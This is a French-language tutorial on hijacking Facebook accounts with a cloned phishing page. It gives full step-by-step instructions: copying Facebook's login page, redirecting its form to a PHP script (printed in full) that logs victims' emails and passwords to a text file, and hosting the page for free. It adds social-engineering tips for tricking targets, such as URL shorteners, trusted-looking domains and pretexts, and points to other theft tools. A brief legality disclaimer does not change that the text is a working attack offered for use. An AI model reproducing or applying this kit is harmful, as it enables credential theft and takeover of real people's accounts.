Comment Facebook pirater en créant une page de phishing personnalisée
Bonjour et bienvenue dans un autre tutoriel de piratage Facebook. Cette fois, je vais vous montrer comment créer manuellement une page de phishing et pirater Facebook avec le phishing et l’ingénierie sociale.
Je vais montrer deux méthodes, l’une est la plus facile pour les débutants qui veulent simplement tester le hack et la seconde est pour ceux qui veulent apprendre le hacking et le pentesting et créer leur page de phishing Facebook personnalisée.
Une attaque de phishing est la méthode d’attaque utilisée par les pirates dans laquelle ils créent une copie du site d’origine qui est exactement la même que le site d’origine. Ensuite, en utilisant l’ingénierie sociale et la créativité, ils envoient le lien de phishing aux personnes pour se connecter. Une fois que quelqu’un signe ses lettres de créance. Les pirates peuvent facilement obtenir le nom d’utilisateur et le mot de passe de la victime au format texte.
Donc, dans ce tutoriel, je vais vous expliquer à la fois la manière facile et technique de pirater Facebook avec une page de phishing personnalisée.
Méthode facile pour pirater facebook:
- Téléchargez les fichiers de piratage: pour mobile et pour ordinateur de bureau (préférez le bureau car ils ne sont pas détectés)
- Hébergement gratuit: 000webhost
- Vous pouvez réellement utiliser n’importe quel hébergement, mais je le suggère car c’est ce que je vais utiliser pour ce tutoriel.
Étapes pour créer une fausse page de phishing Facebook:
Étape 1: Visitez le site Web 000webhost et cliquez sur Inscription GRATUITEMENT à l’aide de n’importe quel e-mail. Il est très important de vérifier votre e-mail via le message de validation que vous recevez pour que votre compte soit actif.
Étape 2: Inscrivez-vous maintenant en utilisant votre identifiant e-mail, définissez un mot de passe et sélectionnez un nom de site Web qui convient à votre hameçonnage.
Étape 3: Après vérification de votre adresse e-mail, cliquez sur Gestionnaire de fichiers, puis cliquez sur Télécharger des fichiers maintenant comme indiqué dans l’image ci-dessous:
Étape 4: Vous serez maintenant redirigé vers le gestionnaire de fichiers réel de votre site Web, comme indiqué ci-dessous:
Étape 5: Vous commencerez par le dossier public_html, qui est exactement là où vous voulez être. Téléchargez les deux fichiers téléchargés index.html et post.php selon que vous souhaitez pirater une version mobile ou de bureau de facebook.
Étape 6: Cliquez sur l’icône de téléchargement dans le coin droit du Gestionnaire de fichiers, comme indiqué dans l’image ci-dessous.
Étape 7: Sélectionnez maintenant les deux index des fichiers.htm et post.php et cliquez sur le bouton de téléchargement comme indiqué dans l’image ci-dessous:
Étape 8: Accédez à la liste des sites Web dans le panneau et copiez l’adresse de lien de votre site Web que vous avez précédemment créée. « Le domaine qui a été créé par l’hébergement »
Page de Phishing mobile Facebook:
Page de phishing sur le bureau facebook:
Étape 9: Une fois que la cible se connecte au site Web, vous verrez le fichier suivant appelé nom d’utilisateur.txt dans le gestionnaire de fichiers comme indiqué ci-dessous:
Étape 10: Ouvrez le fichier pour voir l’identifiant e-mail et le mot de passe du compte.facebook et mot de passe pour facebook.
Ici, j’ai utilisé: sas et sas comme e-mail facebook et mot de passe facebook.
Viola, vous avez piraté avec succès un compte Facebook en utilisant le phishing.
Maintenant, pour ceux qui veulent apprendre, apprenons les détails techniques du piratage manuel de Facebook, voici la version avancée où vous créez vos fichiers.
Méthode avancée: créez manuellement votre page de phishing Facebook personnalisée.
Étape 1: Ouvrir facebook.com
Pour créer une page de phishing, accédez à la page Facebook.com et puis faites un clic droit sur la zone vide. Vous verrez de nombreuses options dont vous avez besoin pour cliquer sur l’option afficher la page source. Comme vous pouvez le voir ci-dessous dans l’image.
Étape 2: Créez une copie locale de la page facebook pour créer la page d’hameçonnage
Lorsque vous cliquez sur afficher la source de la page, un nouvel onglet s’ouvrira comme indiqué ci-dessous montrant tout le tas de code. Ceci est le code source de la page facebook. Vous allez le modifier afin de pouvoir l’utiliser pour créer une page de phishing Facebook. Pour ce faire:
Sélectionnez tout le code et copiez tout le code et collez-le dans le bloc-notes et enregistrez le fichier en tant qu’index.htm. L’extension de fichier est.htm non.html ne faites pas cette erreur.
Source de la page Facebook
Copié le code source facebook pour le phishing dans le bloc-notes
Étape 3: Modifiez le code source
Ouvrez maintenant le bloc-notes dans lequel vous avez collé ce code et appuyez sur CTRL + F et tapez ACTION dans la barre de recherche. C’est un peu délicat mais vous devez trouver la ligne suivante dans le code.
action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
Lorsque vous trouvez le code similaire au code que j’ai mentionné ci-dessus, supprimez tout le code texte devant le mot action et remplacez-le par le mot post.php comme indiqué ci-dessous:
Alors le code final ressemblera à ceci:
action="post.php"
Source de la page Facebook modifiée pour le phishing
Étape 4: Enregistrez les fichiers
Maintenant si vous ne l’avez pas déjà enregistré, enregistrez-le dans un nouveau dossier avec le nom index.htm Maintenant, vous avez terminé la première partie de la page de phishing.
Étape 5: Création du fichier PHP
Pour créer la deuxième partie de la page de phishing Facebook, vous devez créer un fichier PHP. Je nomme mon fichier comme post.php puisque c’est ce que j’ai édité dans le code source de la première partie. Si vous envisagez d’utiliser un nom différent, assurez-vous de le changer dans l’index.htm aussi.
Ouvrez un nouveau fichier bloc-notes et copiez le code ci-dessous et enregistrez-le avec le nom post.php. Vous pouvez vous référer aux images ci-dessous pour référence:
<?phpheader ('Location:http://www.facebook.com/');$handle = fopen("usernames.txt", "a");foreach($_POST as $variable => $value) {fwrite($handle, $variable);fwrite($handle, "=");fwrite($handle, $value);fwrite($handle, "\r\n");}fwrite($handle, "\r\n");fclose($handle);exit;?>
Étape 6: Copiez les fichiers de phishing Facebook ensemble
Maintenant, vous avez réussi à créer deux fichiers qui doivent être enregistrés dans le même dossier.
- index.htm
- poste.php
Étape 7: Créer un compte hébergement gratuit compte web
Visitez le site Web 000webhost et cliquez sur Inscription GRATUITEMENT à l’aide de n’importe quel e-mail. Il est très important de vérifier votre e-mail via le message de validation que vous recevez pour que votre compte soit actif.
Étape 8: Ouvrez le gestionnaire de fichiers et téléchargez les fichiers
Maintenant ouvrez Cpanel (panneau de configuration) sur le tableau de bord de votre hébergement. Ouvrez le gestionnaire de fichiers, puis cliquez sur gestionnaire de fichiers allez dans le dossier public_html. Par défaut, vous devez être dans ce dossier
Étape 9: Index de téléchargement.htm et post.php
Cliquez sur le bouton Télécharger des fichiers et téléchargez les deux fichiers que vous aviez précédemment enregistrés comme indiqué dans les images ci-dessous.
Étape 10: Assurez-vous que tous les fichiers sont téléchargés.
Assurez-vous que tous les fichiers de phishing sont téléchargés, puis ouvrez votre site Web. Vous devriez voir la page facebook d’origine, mais lorsque vous verrez l’URL, vous saurez qu’il s’agit d’une page de phishing
Étape 11: Accédez à la liste des sites Web dans le panneau et copiez l’adresse de lien de votre site Web que vous avez précédemment créée.
Page de phishing sur le bureau facebook:
Étape 12: Une fois que la cible se connecte au site Web, vous verrez le fichier suivant appelé nom d’utilisateur.txt dans le gestionnaire de fichiers comme indiqué ci-dessous:
Étape 13: Ouvrez le fichier pour voir l’identifiant e-mail et le mot de passe du compte.facebook et mot de passe pour facebook.
Ici, j’ai utilisé: sas et sas comme e-mail facebook et mot de passe facebook.
Viola, vous avez piraté avec succès un compte Facebook en utilisant le phishing. Ceci est votre page de phishing personnalisée pour Facebook. J’espère que cela vous a plu et que cela a fonctionné comme prévu.
Astuces d’ingénierie sociale utilisées par les pirates pour pirater Facebook:
1) Lorsque vous essayez d’envoyer un lien de phishing à la victime cible, vous devez utiliser un raccourcisseur d’URL comme TinyURL qui aidera à masquer le domaine.
2) Choisissez un bon domaine qui sera approuvé par la cible.
3) Soyez créatif. Un bon prétexte est nécessaire pour que la cible ne soupçonne pas.
Questions fréquemment posées sur le piratage de Facebook avec OSIF
Voici quelques-unes des questions qui peuvent vous venir à l’esprit en essayant d’utiliser ce piratage. Si votre question n’est pas présente, veuillez la mentionner dans la section commentaire.
Q1. Cet outil de piratage est-il légal d’utiliser quelqu’un?
Non, vous ne devez pas utiliser ces connaissances pour pirater des personnes. Si vous l’utilisez pour pirater le compte Facebook de quelqu’un, cela est considéré comme une infraction pénale et vous serez responsable de toute action illégale que vous faites. Mais vous pouvez l’utiliser pour tester et acquérir des connaissances sur la façon dont les pirates piratent Facebook en utilisant le phishing et d’autres attaques.
Q2. Existe-t-il des alternatives à cette méthode?
Oui, il existe de nombreuses méthodes pour pirater un compte Facebook. Les plus célèbres sont zshadow, shadowave et anomor. Vous pouvez également utiliser Kali Linux pour pirater Facebook en créant une page de phishing personnalisée.
Q3. Existe-t-il d’autres moyens que le phishing?
Bruteforce et des outils tels que facebook password extractor fonctionneront. Vous pouvez également utiliser un voleur USB pour pirater des comptes Facebook.
Q4. Ça ne fonctionne pas que dois-je faire?
Assurez-vous que le fichier a.extension htm et non.HTML. Comparez mes fichiers avec les vôtres. Essayez étape par étape. Le mobile peut ou non fonctionner car il peut être facilement détecté.